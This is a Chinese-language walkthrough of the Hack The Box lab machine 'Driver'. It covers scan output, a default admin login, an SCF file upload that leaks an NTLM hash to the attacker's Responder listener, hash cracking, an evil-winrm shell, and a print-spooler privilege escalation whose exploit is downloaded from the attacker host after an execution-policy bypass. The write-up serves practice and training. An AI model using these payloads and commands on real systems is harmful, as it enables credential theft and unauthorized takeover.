Hack The Box - Machines - Driver
靶机:10.10.11.106 攻击机:10.10.14.28
1. 信息搜集
代码语言:javascript复制Nmap -sS -sC -sV -A 10.10.11.106
Nmap scan report for 10.10.11.106
Host is up (0.24s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows 10 1511 - 1607 (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), FreeBSD 6.2-RELEASE (86%), Microsoft Windows 10 1607 (85%), Microsoft Windows 10 1511 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-03-04T18:18:39
|_ start_date: 2022-03-04T18:16:38
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m57s
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 241.00 ms 10.10.14.1
2 241.00 ms 10.10.11.106
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . python dirsearch.py --random-agent --exclude-status 400,401,403,404,500,503 -e * -u http://10.10.11.106
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30
Wordlist size: 15492
Output File: E:\信息搜集\目录扫描\dirsearch-master\reports\10.10.11.106\_22-03-04_19-23-56.txt
Error Log: E:\信息搜集\目录扫描\dirsearch-master\logs\errors-22-03-04_19-23-56.log
Target: http://10.10.11.106/
[19:23:57] Starting:
[19:25:26] 301 - 150B - /images -> http://10.10.11.106/images/
Task Completed 端口扫描出来的结果得知靶机开放端口:80,135,445
访问web页面,提示输入账号密码 直接admin admin就进入了。
目录扫描没有结果,但是从页面给出的信息来看,可以得知这是一个打印机
其中FirmWare Updates 可以跳转到fw_up.php页面,而其他都指向页面本身
来到fw_up.php 映入眼帘的是一个文件上传
2. 漏洞利用
文件上传走一波,先上传个php试试水,上传成功,但是这里没有回显出上传之后的路径
经过一番的查找之后还是没能找到php文件的位置所在,没办法只好想想其他的办法。
讲这句话翻译了一下:选择打印机型号并将相应的固件更新上传到我们的文件共享中。我们的测试团队将手动检查上传的内容,并很快启动测试。
本以为会后台自动访问我上传的文件,我上传了一个访问我临时python起的http服务,但是等了半天也没反应。
思来想去没结果,google了一下MFP Firmware Update Center exploit
实际上这里是和smb结合起来使用的,首先先使用Responder本地监听起来
python2 Responder.py --lm -v -I tun0 这里-I后面跟的是网卡的名字
然后再上传一个xxx.scf文件,内容为
代码语言:javascript复制[Shell]
Command=2
IconFile=\10.10.14.28sharepentestlab.ico
# 其中的ip写监听者的ip,也就是攻击机的ip
[Taskbar]
Command=ToggleDesktop
接下来就是等待后台在共享目录中访问该文件
当点击提交后,这边responder就会输出smb用户名和ip还有ntml hash值。
得到ntml hash值之后,用john破解一下该值,需要将该NTML HASH值放入一个txt文件中。
得到 tony的密码 liltony
此时再次使用nmap进行端口扫描
代码语言:javascript复制Nmap -sS -T4 -p- -sC -sV 10.10.11.106
Nmap scan report for 10.10.11.106
Host is up (0.30s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_ Potentially risky methods: TRACE
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-03-04T20:15:13
|_ start_date: 2022-03-04T18:16:38
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s 
这里出现了一个刚刚没有发现的端口 5985 这个端口存在着漏洞,可以直接获取到交互式的shell
使用工具:evil-winrm 安装命令:gem install evil-winrm
命令:evil-winrm -i ip -u username -p passwd 这里username和passwd都获取到了,直接填写,进入即可,可以看到登陆成功,并且拿到了用户flag
3. 权限提升
目前权限是用户权限,并不是amdinistrator的权限,需要进行提权获取administrator的hash值
看了一下netstat -ano和tasklist /svc 都提示我权限不足,所以我就选择了WinPEAS.exe
让靶机在我们攻击机下载一个winPEAS.exe检测一下系统存在哪些可利用的提权漏洞
因为是在powershell中,所以直接使用wget来下载就可以了。
下载好了之后,直接./exp.exe运行起来
虽然没有发现其他的东西,但是在这里发现了任务列表,其中有一项spoolsv,是后台打印程序服务
存在一个CVE,可以进行权限绕过的RCE漏洞,文中写到可以创建具有完全用户权限的账户,然后我找到了ps1版本的exp
git clone到本地kali linux,然后用靶机的powershell从kali中下载并保存
在运行exp.ps1的时候报错了:
这是因为powershell的策略问题,给他关掉就好:Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force;
kami已经加入本地管理员组了,接下来再用evil-winrm登录即可
